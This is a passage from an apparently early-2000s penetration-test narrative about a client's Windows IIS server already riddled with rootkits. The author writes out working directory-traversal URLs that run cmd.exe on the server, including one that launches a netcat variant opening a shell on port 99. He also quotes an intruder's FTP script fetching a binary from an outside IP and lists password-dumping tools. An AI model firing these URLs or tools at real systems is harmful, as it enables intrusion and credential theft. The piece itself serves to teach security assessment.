- The Client
- The Preliminary Investigation: Day 1, Afternoon
- Penetration Testing: Day 1, Night
- Owned by Joe, Mary, Pete, and I Think My Mother
- Hacker Scripts
- Summary
Like this article? We recommend
Like this article? We recommend
Like this article? We recommend
Penetration Testing: Day 1, Night
At this point, I had a good notion of where to start probing. Using the following URL, I commanded the server to show me a directory listing of the c:\winnt\system32 directory:
http://192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe? /c+dir+c:\winnt\system32\
Once the browser returned the results, I scanned the files and folders and quickly spotted several suspicious files that perked my interest. Figure 1 is a screen shot of these files—see if you can spot the problem.
)
Figure 1 Partial directory listing of c:\winnt\system32\.
Did anything seem like it didn't belong? If you recognized these files for what they are, congratulations! Unfortunately, many network administrators wouldn't give these files a second glance.
The following is a listing of the files that concerned me and why:
PipeCmd.exe: Client side of a remote-control tool used by hackers.
omnithread_tr.dll: One of the three files needed to set up VNC, a popular and legitimate remote-control utility.
VNCHooks.dll: The second of three files needed to set up VNC.
Vnsystask.exe: The third of three files needed to set up an illegitimate back-door VNC program that hides from the user.
nc.exe: Netcat, a very common remote shell program.
pw.exe: Also known as pwdump(2).exe. A program that extracts NT users and passwords.
Samdump.dll: File required by pwdump.exe to extra user account information.
GetAdmin.exe: Common program that gives user administrator rights.
In other words, this server had not one, but two root kits installed in the c:\winnt\system32 directory. As I was about to learn, this was just one of more than 10 root kits that were all competing for the server's attention. In fact, the SysStat directory that is also shown in Figure 1 and that was installed October 7, 2002, includes yet another root kit.
Next, I used another URL to pull up the c:\ directory listing, just to see if there were any interesting files located in the root directory of the server. The following is the URL used. Listing 2 shows the output it provided.
http://192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/
Listing 1-2: Directory Listing of the Server's C Drive
Volume in drive C has no label.
Volume Serial Number is DCF0-0832
Directory of C:
10/10/02 01:03p 1,000,000 1mb
05/20/02 09:32a 0 AUTOEXEC.BAT
10/18/02 12:57a 789 bootobc.dll
10/10/02 12:42p 223 CDIR.TXT
05/20/02 09:32a 0 CONFIG.SYS
10/30/02 05:53p 0 dir.txt
11/23/99 10:04a 208,144 dns.exe
06/07/02 11:04a 524,288 errorlog.evt
05/28/02 07:06p <DIR> exchsrvr
10/04/02 06:38p 0 explorer.exe
10/04/02 06:38p 0 explorer.ini
05/20/02 10:18p <DIR> hpfonts
09/24/02 06:49p <DIR> hplj2100
09/29/02 01:03p 6,721,536 httpodbc.dll
09/27/02 09:36p <DIR> IIStmp
10/18/02 01:11a <DIR> InetPub
10/10/02 12:45p 6,656 INFUSE.EXE
10/10/02 12:43p 602 LOGIN.TXT
10/02/02 02:17p 59,392 ncx99.exe
10/30/02 02:47p 6,693 netstat.txt
10/30/02 10:09a 536,870,912 pagefile.sys
07/24/02 01:29p <DIR> Program Files
10/10/02 12:44p 81 pt.txt
10/14/02 05:21a 1,307 ra_slave.log
10/26/02 01:21p 716 Script.bat
10/26/02 01:21p 95 Script.txt
10/29/02 07:42p 1,949 servudaemon.ini
10/28/02 04:40p 528 ServUStartUpLog.txt
10/04/02 04:25p 15,000,000 SR.CD2-H2O.r41
09/28/02 01:33p <DIR> TEMP
10/10/02 12:43p 17,920 TLIST.EXE
06/18/02 10:00p <DIR> veritas
09/28/02 01:18p <DIR> WIN32
10/10/02 12:45p 496,836 WINMGNT.EXE
10/30/02 01:09p <DIR> WINNT
35 File(s) 560,918,667 bytes
At this point, I laughed as I started to realize the scope of infestation. In the root directory of the server were two files, scripts.bat and scripts.txt, that all but screamed "installed by a hacker." Out of curiosity, I decided to pull up the contents of these two files to see what they contained. The following are the URLs I used to do this. Listings 3 and 4 show the contents returned to the browser.
http://192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/
Listing 1-3: Contents of the scripts.bat File
Mkdir c:\recycler Mkdir c:\recycler\S-1-5-21-1831738385-770969707-784038887-1117 Mkdir c:\recycler\S-1-5-21-1831738385-770969707-784038887-1117\trash Mkdir c:\recycler\S-1-5-21-1831738385-770969707-784038887-1117\trash
Listing 1-4: Contents of the scripts.txt File
open 210.171.xxx.xxx:11515 USER ironfredh hichic get svhost.exe get servudaemon.ini quit
In other words, this server was H4x0r3d. I was feeling a bit left out of the fun, so I figured I would follow the path so clearly laid before me. So, I typed in one last URL that would execute the ncx99.exe file sitting in the c: directory, and then I telnetted to port 99 on the server:
http://192.168.0.66/MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe, /c+c:\ncx99.exe
NOTE
ncx99.exe is a popular hacked version of netcat that opens an unprotected shell on port 99. This allows anyone using any operating system that supports Telnet to connect to and control the host system.
Upon connection, I changed the directory to c:\ to verify that I was on the undeniably hacked server. I then performed a full directory listing and outputted the results to a file in the c:\ directory using the dir /s >> dir.txt command, which I then downloaded to my computer for a closer analysis.